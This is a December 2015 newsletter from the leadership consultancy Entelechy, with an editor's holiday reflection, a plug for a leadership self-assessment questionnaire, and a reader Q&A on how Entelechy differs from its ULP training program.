December 2015 Newsletter

Letter from the Editor

I know, I know…who wants to read a newsletter in December?

Bears have it easy this time of year. They curl up and hibernate. People aren’t as smart. We fill every waking hour in December with personal and business obligations all the while trying our best to stay focused20151215LFE on what’s important.

That said, I promise I’ll keep this brief.

Besides seemingly uninterrupted activities, the holiday season also seems to bring out an overwhelming urge to reflect and assess. Perhaps it’s the changing of the year, perhaps the shorter, darker days. Despite our harried pace, great leaders always seem to feel compelled to reflect on the previous year — where they triumphed, where they could have done better, where they hope to go in the coming year.

During one of my reflective periods, I was fortunate enough to come across a succinct and amazingly powerful article from a person recognized as the #1 Leadership Thinker in the World, Marshall Goldsmith. His article is titled “6 Questions that Will Set You Up to Be Super Successful.”

I’d be honored to have you consider this link to be our holiday gift this year.

How Does Your Organization’s Leadership Measure Up?
As mentioned in the opening of this newsletter, the Holiday Season is an appropriate time to reflect on accomplishments of the past year and, particularly, for setting future goals.

Among the best ways to determine the action steps necessary for future success is to stop and evaluate where you are today. Are you heading in the right direction? Are there unrealized opportunities to accelerate progress?

To help answer these questions, we’ve developed this straightforward questionnaire: “How Does Your Organization’s Leadership Measure Up?” The results of this survey should prove invaluable as you plan your next year’s pathway to effective leadership.

Dear Terry

20150316_I_Field_Your_QuesBruce from Seattle: What’s the difference between your Entelechy website ( and your website for “ULP” ( they the same thing? Please help me understand the difference.

Terry: Entelechy is the original consulting practice where the methodology for training thousands of leaders was developed. It’s the ENGINE that powers the program. In practice, a company may bring in Entelechy staff to design, develop and train.

ULP is the program that teaches the specifics on how to achieve lasting leadership success, leveraging the models and activities that we’ve honed through the years. We — Entelechy, you, or us together — customize the ULP program specifically for you. As important, ULP provides the flexibility to retain and actually increase its value as the company grows and changes. The techniques developed with ULP become an essential part of the company’s culture.

I invite you to learn more by visiting the ULP website.
